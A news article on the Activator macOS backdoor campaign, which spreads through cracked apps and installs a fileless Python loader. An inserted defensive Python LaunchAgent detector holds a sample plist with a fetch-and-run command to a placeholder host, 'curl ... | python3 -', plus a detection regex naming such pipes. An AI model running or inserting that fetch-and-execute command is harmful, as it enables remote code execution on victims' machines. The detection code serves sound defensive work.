macOS Malware Campaign Showcases Novel Delivery Technique

February 2, 2024

Security researchers have sounded the alarm on a new cyberattack campaign using cracked copies of popular software products to distribute a backdoor to macOS users.

What makes the campaign different from numerous others that have employed a similar tactic — such as one reported just earlier this month involving Chinese websites — is its sheer scale and its novel, multistage payload delivery technique. Also noteworthy is the threat actor’s use of cracked macOS apps with titles that are of likely interest to business users, so organizations that don’t restrict what users download can be at risk as well.

Kaspersky was the first to discover and report on the Activator macOS backdoor in January 2024. A subsequent analysis of the malicious activity by SentinelOne has shown the malware to be “running rife through torrents of macOS apps,” according to the security vendor.

“Our data is based on the number and frequency of unique samples that have appeared across VirusTotal,” says Phil Stokes, a threat researcher at SentinelOne. “In January since this malware was first discovered, we’ve seen more unique samples of this than any other macOS malware that we [tracked] over the same period of time.”

The number of samples of the Activator backdoor that SentinelOne has observed is more than even the volume of macOS adware and bundleware loaders (think Adload and Pirrit) that are supported by large affiliate networks, Stokes says. “While we have no data to correlate that with infected devices, the rate of unique uploads to VT and the variety of different applications being used as lures suggests that in-the-wild infections will be significant.”

Building a macOS Botnet?

One potential explanation for the scale of the activity is that the threat actor is attempting to assemble a macOS botnet, but that remains just a hypothesis for the moment, Stokes says.

The threat actor behind the Activator campaign is using as many as 70 unique cracked macOS applications — or “free” apps with copy protections removed — to distribute the malware. Many of the cracked apps have business-focused titles that could be of interest to individuals in workplace settings. A sampling: Snag It, Nisus Writer Express, and Rhino-8, a surface modeling tool for engineering, architecture, automotive design, and other use cases.

“There are many tools useful for work purposes that are used as lures by macOS.Bkdr.Activator,” Stokes says. “Employers that do not restrict what software users can download could be at risk of compromise if a user downloads an app that is infected with the backdoor.”

Threat actors seeking to distribute malware via cracked apps typically embed the malicious code and backdoors within the app itself. In the case of Activator, the attacker has employed a somewhat different strategy to deliver the backdoor.

Different Delivery Method

Unlike many macOS malware threats, Activator doesn’t actually infect the cracked software itself, Stokes says. Instead, users get an unusable version of the cracked app they want to download, and an “Activator” app containing two malicious executables. Users are instructed to copy both apps to the Applications folder, and run the Activator app.

The app then prompts the user for the admin password, which it uses to disable macOS’ Gatekeeper settings so that applications from outside Apple’s official app store can run on the device. The malware then initiates a series of malicious actions that ultimately turn off the system’s notifications setting and install a Launch Agent on the device, among other things. The Activator backdoor itself is a first-stage installer and downloader for other malware.

The multistage delivery process “provides the user with the cracked software, but backdoors the victim during the installation process,” Stokes says. “This means that even if the user later decided to remove the cracked software, it will not remove the infection.”

Sergey Puzan, malware analyst at Kaspersky, points to another aspect of the Activator campaign that is noteworthy. “This campaign uses a Python backdoor that doesn’t appear on disk at all and is launched directly from the loader script,” Puzan says. “Using Python scripts without any ‘compilers’ such as pyinstaller is a bit more tricky as it requires attackers to carry a Python interpreter at some attack stage or ensure that the victim has a compatible Python version installed.”
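As an added defensive illustration (not code from the article or from either vendor), the following Python check parses a macOS LaunchAgent plist and flags the traits described above: a persistent agent whose program is a shell or script interpreter and whose command line fetches a script and feeds it straight into Python rather than writing it to disk. The two plists, their labels and the URL are constructed placeholders, not real Activator artifacts.

```python
import os
import plistlib
import re

# Constructed sample LaunchAgent plists (illustrative; not real Activator artifacts).
# The first mirrors the chain the article describes: a shell one-liner that feeds a
# downloaded Python script straight into the interpreter, so nothing is written to disk.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL http://placeholder.invalid/stage | python3 -</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Backup.app/Contents/MacOS/backupd</string>
    <string>--daemon</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript", "perl"}
# A download piped into an interpreter, or Python reading its script from stdin / -c.
FILELESS_RE = re.compile(
    r"\b(curl|wget)\b[^|]*\|\s*(python3?|sh|bash|zsh|perl)\b|\bpython3?\s+-c?(?=\s|$)")

def assess_launch_agent(plist_bytes):
    """Return (label, reasons); an empty reasons list means nothing was flagged."""
    d = plistlib.loads(plist_bytes)
    args = list(d.get("ProgramArguments") or [])
    if not args and d.get("Program"):
        args = [d["Program"]]
    reasons = []
    if args and os.path.basename(args[0]) in INTERPRETERS:
        reasons.append("program is an interpreter: %s" % args[0])
    if FILELESS_RE.search(" ".join(args)):
        reasons.append("downloads or pipes a script straight into an interpreter")
    if reasons and d.get("RunAtLoad") and d.get("KeepAlive"):
        reasons.append("kept alive at login (RunAtLoad + KeepAlive)")
    return d.get("Label", "<no label>"), reasons
```

On a real host the same function can be run over every file in ~/Library/LaunchAgents and /Library/LaunchAgents; a hit is a lead for triage, not proof of compromise, since legitimate tools also ship shell-wrapped agents.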

Puzan also believes that one potential goal of the threat actor behind this campaign is to build a macOS botnet. But since Kaspersky’s report on the Activator campaign, the company has not observed any additional activity, he adds.